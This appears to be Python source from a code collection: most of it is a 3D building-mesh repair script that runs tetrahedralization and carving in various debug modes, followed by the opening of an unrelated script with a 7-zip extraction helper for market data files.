CarveFunc.globalHeuristic['level'] = 0
CarveFunc.globalHeuristic['deg'] = 0
#dof+curvature
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['curvature'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_curve.obj")
#dof+curvature+deg
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['deg'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_curve_deg.obj")
CarveFunc.globalHeuristic['curvature'] = 0
CarveFunc.globalHeuristic['deg'] = 0
CarveFunc.globalHeuristic['dof'] = 0
#deg
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['deg'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_deg.obj")
CarveFunc.globalHeuristic['deg'] = 0
#vloume
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['volume'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_vol.obj")
CarveFunc.globalHeuristic['volume'] = 0
#flatness
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['flatness'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_flat.obj")
CarveFunc.globalHeuristic['flatness'] = 0
#depth
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['depth'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_depth.obj")
CarveFunc.globalHeuristic['depth'] = 0
#distant
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['distanceToCenter'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist.obj")
CarveFunc.globalHeuristic['distanceToCenter'] = 0
#direction
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['direction'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_direction.obj")
CarveFunc.globalHeuristic['direction'] = 0
#area
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['area'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_area.obj")
CarveFunc.globalHeuristic['area'] = 0
#level
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['level'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level.obj")
CarveFunc.globalHeuristic['level'] = 0
#curvature
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['curvature'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_curve.obj")
CarveFunc.globalHeuristic['curvature'] = 0
elif int(debugControl) == 5:
print("Mode 5 new comparison mode start...\n")
#Constrained Tetrahedralization
if False == TetraFunc.CDT():
print("Constrained Delauney Tetrahedralization FAILED!")
return
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_CDT.obj")
#####copy datacopy
ModelDataFuncs.preserveModelData()
CarveFunc.globalOutputGlobalSTA = True
#switches = [('dof',0), ('deg', 0), ('volume',0), ('flatness',0),('depth',0), ('distanceToCenter',1), ('directions',0), ('area' ,0), ('level' ,0), ('curvature',0)]
#already generated in mode 4 thus commented
#None
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_none.obj")
##dof
#ModelDataFuncs. restoreModelData()
#CarveFunc.indicators = ['dof']
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof.obj")
# #deg
#ModelDataFuncs. restoreModelData()
#CarveFunc.indicators = ['deg']
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_deg.obj")
##vloume
#ModelDataFuncs. restoreModelData()
#CarveFunc.indicators = ['vol']
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_vol.obj")
##flatness
#ModelDataFuncs. restoreModelData()
#CarveFunc.indicators = ['flatness']
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_flat.obj")
##depth
#ModelDataFuncs. restoreModelData()
#CarveFunc.indicators = ['depth']
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_depth.obj")
##distant
#ModelDataFuncs. restoreModelData()
#CarveFunc.indicators = ['distanceToCenter']
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist.obj")
# #direction
#ModelDataFuncs. restoreModelData()
#CarveFunc.indicators = ['direction']
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_direction.obj")
##area
#ModelDataFuncs. restoreModelData()
#CarveFunc.indicators = ['area']
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_area.obj")
##level
#ModelDataFuncs. restoreModelData()
#CarveFunc.indicators = ['level']
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level.obj")
##curvature
#ModelDataFuncs. restoreModelData()
#CarveFunc.indicators = ['curvature']
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_curve.obj")
#different combinations including some results from mode 4
#
#combinations
CarveFunc.indicators = [ 'level', 'volume']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_vol.obj")
CarveFunc.indicators = [ 'level', 'area']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_area.obj")
CarveFunc.indicators = [ 'level', 'flatness']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_flat.obj")
CarveFunc.indicators = [ 'level', 'depth']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_depth.obj")
CarveFunc.indicators = [ 'level', 'curvature']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_curve.obj")
CarveFunc.indicators = [ 'level', 'dof']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_dof.obj")
CarveFunc.indicators = [ 'directions', 'volume']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_vol.obj")
CarveFunc.indicators = [ 'directions', 'area']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_area.obj")
CarveFunc.indicators = [ 'directions', 'flatness']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_flat.obj")
CarveFunc.indicators = [ 'directions', 'depth']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_depth.obj")
CarveFunc.indicators = [ 'directions', 'curvature']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_curve.obj")
CarveFunc.indicators = [ 'directions', 'dof']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_dof.obj")
CarveFunc.indicators = [ 'distanceToCenter', 'volume']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_vol.obj")
CarveFunc.indicators = [ 'distanceToCenter', 'area']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_area.obj")
CarveFunc.indicators = [ 'distanceToCenter', 'flatness']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_flat.obj")
CarveFunc.indicators = [ 'distanceToCenter', 'depth']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_depth.obj")
CarveFunc.indicators = [ 'distanceToCenter', 'curvature']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_curve.obj")
CarveFunc.indicators = [ 'distanceToCenter', 'dof']
ModelDataFuncs. restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_dof.obj")
##complex comninations
#CarveFunc.indicators = ['dof', 'level', 'volume']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_level_vol.obj")
#CarveFunc.indicators = ['dof', 'level', 'area']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_level_area.obj")
#CarveFunc.indicators = ['dof', 'level', 'flatness']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_level_flat.obj")
#CarveFunc.indicators = ['dof', 'level', 'depth']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_level_depth.obj")
#CarveFunc.indicators = ['dof', 'level', 'curvature']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_level_curve.obj")
#CarveFunc.indicators = ['dof', 'directions', 'volume']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_directions_vol.obj")
#CarveFunc.indicators = ['dof', 'directions', 'area']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_directions_area.obj")
#CarveFunc.indicators = ['dof', 'directions', 'flatness']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_directions_flat.obj")
#CarveFunc.indicators = ['dof', 'directions', 'depth']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_directions_depth.obj")
#CarveFunc.indicators = ['dof', 'directions', 'curvature']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_directions_curve.obj")
#CarveFunc.indicators = ['dof', 'distanceToCenter', 'volume']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_dist_vol.obj")
#CarveFunc.indicators = ['dof', 'distanceToCenter', 'area']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_dist_area.obj")
#CarveFunc.indicators = ['dof', 'distanceToCenter', 'flatness']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_dist_flat.obj")
#CarveFunc.indicators = ['dof', 'distanceToCenter', 'depth']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_dist_depth.obj")
#CarveFunc.indicators = ['dof', 'distanceToCenter', 'curvature']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_dist_curve.obj")
#CarveFunc.indicators = ['level', 'volume', 'dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_vol_dof.obj")
#CarveFunc.indicators = ['level', 'area' , 'dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_area_dof.obj")
#CarveFunc.indicators = ['level', 'flatness', 'dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_flat_dof.obj")
#CarveFunc.indicators = ['level', 'depth', 'dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_depth_dof.obj")
#CarveFunc.indicators = ['level', 'curvature', 'dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_curve_dof.obj")
#CarveFunc.indicators = ['directions', 'volume','dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_vol_dof.obj")
#CarveFunc.indicators = ['directions', 'area', 'dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_area_dof.obj")
#CarveFunc.indicators = ['directions', 'flatness','dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_flat_dof.obj")
#CarveFunc.indicators = ['directions', 'depth', 'dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_depth_dof.obj")
#CarveFunc.indicators = ['directions', 'curvature', 'dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_curve_dof.obj")
#CarveFunc.indicators = ['distanceToCenter', 'volume', 'dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_vol_dof.obj")
#CarveFunc.indicators = ['distanceToCenter', 'area', 'dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_area_dof.obj")
#CarveFunc.indicators = ['distanceToCenter', 'flatness','dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_flat_dof.obj")
#CarveFunc.indicators = ['distanceToCenter', 'depth', 'dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_depth_dof.obj")
#CarveFunc.indicators = ['distanceToCenter', 'curvature','dof']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_curve_dof.obj")
#CarveFunc.indicators = ['level', 'volume']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_volume.obj")
#CarveFunc.indicators = ['level', 'area' ]
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_area.obj")
#CarveFunc.indicators = ['level', 'flatness']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_flat.obj")
#CarveFunc.indicators = ['level', 'depth']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_depth.obj")
#CarveFunc.indicators = ['level', 'curvature']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level_curve.obj")
#CarveFunc.indicators = ['directions', 'volume']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_volume.obj")
#CarveFunc.indicators = ['directions', 'area']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_area.obj")
#CarveFunc.indicators = ['directions', 'flatness']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_flat.obj")
#CarveFunc.indicators = ['directions', 'depth']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_depth.obj")
#CarveFunc.indicators = ['directions', 'curvature']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_directions_curve.obj")
#CarveFunc.indicators = ['distanceToCenter', 'volume']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_volume.obj")
#CarveFunc.indicators = ['distanceToCenter', 'area']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_area.obj")
#CarveFunc.indicators = ['distanceToCenter', 'flatness']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_flat.obj")
#CarveFunc.indicators = ['distanceToCenter', 'depth']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_depth.obj")
#CarveFunc.indicators = ['distanceToCenter', 'curvature']
#ModelDataFuncs. restoreModelData()
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist_curve.obj")
elif int(debugControl) == 6:
print("Mode 6 verify mode start...\n")
#Constrained Tetrahedralization
if False == TetraFunc.CDT():
print("Constrained Delauney Tetrahedralization FAILED!")
return
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_CDT.obj")
#####copy datacopy
ModelDataFuncs.preserveModelData()
CarveFunc.globalOutputGlobalSTA = True
CarveFunc.indicators = [ 'level']
ModelDataFuncs.restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level.obj")
#####copy datacopy
CarveFunc.globalOutputGlobalSTA = True
CarveFunc.indicators = [ 'distanceToCenter']
ModelDataFuncs.restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist.obj")
#####copy datacopy
CarveFunc.globalOutputGlobalSTA = True
CarveFunc.indicators = [ 'directions']
ModelDataFuncs.restoreModelData()
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_direction.obj")
elif int(debugControl) == 7 and isSemantic:
print("Mode7 deduce semantic mode start...\n")
#Constrained Tetrahedralization
TetraFunc.deduce_semantics_of_poly(isSemantic)
ModelDataFuncs.writer_poly_with_semantics(ModelData.strInputFileName + "_OUTPUT.poly")
else:
print("Full start...\n")
#Decomposit all the triangles
DecomposeFunc.model_decompositionEx()
#Merge all the coplaner dictFaces
#coplaner_face_merge()
ModelDataFuncs.writer_obj(ModelData.strInputFileName +"_DEC.obj")
#Constrained Tetrahedralization
if False == TetraFunc.CDT():
print("Constrained Delauney Tetrahedralization FAILED!")
return
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_CDT.obj")
#Heuristic carving
CarveFunc.heuristic_tet_carving()
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_CARVE.obj")
#Reconstruct the mesh from tetrahedron
TetraFunc.extract_mesh_from_tet(isSemantic)
#Output
ModelDataFuncs.writer_obj(ModelData.strInputFileName + "_OUTPUT.obj")
if isSemantic:
ModelDataFuncs.writer_poly_with_semantics(ModelData.strInputFileName + "_OUTPUT.poly")
#Move the results to another folder
#filepath, filename=os.path.split(sys.argv[1])
#filepath = os.path.join(filepath, "res_tr1_with_tiny")
#filepath = "C:\\Users\\John\\Desktop\\rotterdam\\3-28-Witte_Dorp\\obj\\res_tr1_del_tiny\\"
#if not os.path.exists(filepath):
# os.mkdir(filepath)
#os.rename(inputFilePath, filepath + inputFilePath)
#os.rename(inputFilePath + "_OUTPUT.obj", filepath + inputFilePath + "_OUTPUT.obj")
#os.rename(inputFilePath + "_DEC.obj", filepath + inputFilePath + "_DEC.obj")
def Main():
if len(sys.argv) < 2:
print (
'''Usage of RepairShrink:
Python RepairShrink.py MODELFILEPATH(.obj|.poly) (-s) debugControl
Note: obj format does not support semantics while poly format support basic semantics of CityGML''')
sys.exit()
if os.path.isdir(sys.argv[1]):
os.chdir(sys.argv[1])
dFiles = []
for f in os.listdir('.'):
fileName, fileExt = os.path.splitext(f)
if fileExt == '.poly':
dFiles.append(f)
#elif fileExt == '.obj':
#dFiles.append(f)
if len(dFiles) == 0:
print ('Emptry folder!')
sys.exit()
for fName in dFiles:
try:
if len(sys.argv) == 4:
if sys.argv[2] == '-s':
do_the_work(fName, True, sys.argv[3])
else:
do_the_work(fName, False, sys.argv[3])
elif len(sys.argv) == 3:
do_the_work(fName, False, sys.argv[2])
elif len(sys.argv) == 2:
do_the_work(fName, False, 0)
except ValueError:
print("{} has a problem").format(fName)
else:
fileName, fileExt = os.path.splitext(sys.argv[1])
if fileExt not in ('.obj', '.poly'):
print ("The input parameter 1 should be a OBJ or POLY file or a folder of a set of model files")
sys.exit()
else:
if len(sys.argv) == 4:
if sys.argv[2] == '-s':
do_the_work(sys.argv[1], True, sys.argv[3])
else:
do_the_work(sys.argv[1], False, sys.argv[3])
elif len(sys.argv) == 3:
do_the_work(sys.argv[1], False, sys.argv[2])
elif len(sys.argv) == 2:
do_the_work(sys.argv[1], False, 0)
if __name__ == '__main__':
Main()
``` |
{
"source": "Johnzjy/SZL2",
"score": 3
} |
#### File: Johnzjy/SZL2/GetSZL2snaplevels_v0.1_py3.py
```python
import os
import os.path
import re
import string
import sys
import time
input_dir="./";
output_dir="./";
#molde='_snap_level_spot'
molde='_hq_trade_spot'
#้่ฆๆ นๆฎ่ชๅทฑ็็ณป็ป 7z.exe ่ทฏๅพๆดๆน
PATH_7z_EXE= 'C:\Program Files (x86)\MyDrivers\DriverGenius'
def unzip_7z(_path,_file):
"""
unzip the 7-zip to the current path
Parameters
----------
_path: file path
_file: file name
Returns
-------
"""
rar_path=_path+_file
print (rar_path)
un_file_name,num=os.path.splitext(rar_path)
if len(num) == 4:
un_path,format_name=os.path.splitext(un_file_name)
if format_name == ".7z":
un_path = '"{}"'.format(un_path)
_cwd=os.getcwd()
